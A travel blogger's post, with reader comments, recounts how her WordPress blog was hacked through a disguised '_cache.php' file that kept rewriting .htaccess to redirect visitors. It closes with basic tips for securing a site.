BrowsingRome Blogging about my experiences and sharing my thoughts about Rome, Italy and beyond
Last week my blog was hacked! What a nightmare. Before I continue, I would like to thank everyone who had sent me a message advising me about the situation. Thank you so much for keeping an eye out for this blog. Also a huge thank you to my husband who spent hours in getting this all resolved.
I have been asked about what happened and in short, it got hacked. However, many were curious to know the details and thus I asked my husband give a technical report to hopefully help you avoid or resolve this problem should you ever have to deal with this.
What happened exactly? Someone found a way to place a script on my webserver’s file system which would then modify a little file called .htaccess.
This unknown little file has the ability to redirect visitors coming to my blog to another site that is usually infected with viruses. Google spotted this and started advising their users that my blog was infected with malware.
The problem was clear, my .htaccess file would redirect people coming to my blog to a Russian website. My husband was able to spot the script to this relatively quick and in turn we fixed the file and restored a working configuration from a backup.
We assumed we had fixed everything, easy we thought! That was wishful thinking as after several hours we had noticed that the .htaccess file was infected again. Fixing the problem didn’t help, we had to find the source of the problem.
It’s like taking an aspirin when you have a fever. It helps reduce the fever but if the fever is caused by an infection, simply going after the fever is only a short-term solution. This was the problem we were faced with.
It took several days and a lot of patience to run different level of controls (db, filesystems etc) to finally spot a file that looked harmless as it was named “_cache.php”. At first glance, and judging by the name, it seemed like a legit systems file.
However, the date when it was last modified was odd. It was more recent than any of the other php file on our system. Once the file was downloaded, we realized that it contained a php function called “preg_replace” which uses exadecimal values to hide the actual coding.
So if you search – and we did – for files containing scripts, or the word “htaccess”, you would never find it. In fact, this file is basically encrypted and contains coding such as “\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x” that once executed is converted to standard characters. (This explanation was beyond me!)
Once we’ve deleted the “_cache.php” file we submitted a request to Google, via their webmaster tools to have them scan our website and mark it as clean. After 4 days Google has finished the scan and we are happy to announce that we are now officially healed and clean!
What have we learned from this?
Here are a few tips on how to minimize the possibility of getting your website/blog hacked. Assuming that you are using an open source Content Management System (CMS), such as WordPress, here are some tips:
– Keep it up to date: Upgrade to the latest version of WordPress as soon as it has been released. Even minor updates may include fixes to critical security issues.
– Keep the use of third-party plugins to a minimum: It’s nice to have a lot of additional features that go beyond what WordPress provides, however don’t get carried away!
– Set the .htaccess file to 444 (it’s technical and if you know what it means -get it done..If not you need to find a technical person to help you out).
– Protect your dabatase against injection attacks: Sometimes hackers will try to mess up your database by inserting SQL code into your form input field.
– Use passwords that are difficult to guess for both WordPress and your FTP.
– Backup your blog frequently.
– Make sure that your computer/laptop is virus-free.
As we have often heard,”Prevention is better than cure” and where possible, do take the necessary measures to “protect” your website/blog.While I am fortunate to have my husband deal with this mess, it was nerve-wrecking not knowing if I would lose all my posts or not. Thank goodness it is now all resolved!
Thanks for sharing your learning Diana. I hope I never have to use this knowledge…fingers crossed. I am glad things are now back to normal.
Hi Janine, good to hear from you again 🙂 There was another blogger who had the same problem and thankfully, we have both resolved this problem. I hope it is something you don’t ever have to deal with!
Good to have you back! What a nightmare! i wouldn’t be able to deal with this on my own…Thanks for sharing your experience.
It really is and I wouldn’t know where to start. So grateful my husband understands all this coding and technical jargon. All I could do was hope that everything was backed up and no posts were lost 🙂 Thanks for dropping by and commenting again!
Hey Diana,
I am so sorry for what happened and I am scared now! I haven’t updated; I am scared it might change a lot of things… does that happen? Or it just easy?
Hi Hajra, if you are using a standard WordPress themes it should be relatively straightforward. However, for plugins you would need to check the compatibility of each plugin with the updated version. That could be more challenging. My husband recommends that you do a backup on the file system and database before you do the update. Hope that makes sense.
Hi there!
You don’t say where you found the _cache.php file. In the root directory of each site? (I host several sites on one server, all infected.)
Thanks!
Hi Robbin, the _cache.php file was found under wp-content. We also host several sites on one server. Sorry for the delay in getting back. This comment was in the spam folder. Hope it helps!
Sounds like an absolute nightmare!! thankfully you’re back and sorted now… useful tips!
Hi Maria, it was and thank goodness my husband understands all this and dealt with it. I have recently heard that a few people has had their site hacked. Not a pleasant experience at all!
Wow Diana, what an ordeal! But thank you soooo much for sharing all that information. I’m sure it was difficult to write up and explain in simpler terms so I really appreciate your efforts! I do hope it never happens again. :-))
Hi Joy, it’s a pleasure to share this info to help others out if they got hacked or better yet to prevent it from happening. It helped that my husband volunteered to write the technical parts as it’s like a foreign language to me. Thanks for dropping by and sharing your thoughts.
The solution is clear: We must have your husband cloned. How much would you charge for sending me one clone? (My thanks to Joy for alerting me to your post!)
It’s wonderful that my husband figured out the problem and resolved it but I don’t think we need to clone him hahaha. One of him is all the world can handle.
What a mess! Glad you could fix it though the interim was a nightmare. Thanks for tipping us off as to how to avoid this happening.
It really was and I am glad my husband was able to fix it. I have heard a couple more people whose site has been hacked after mine. Hopefully these tips will help so that you can avoid this experience!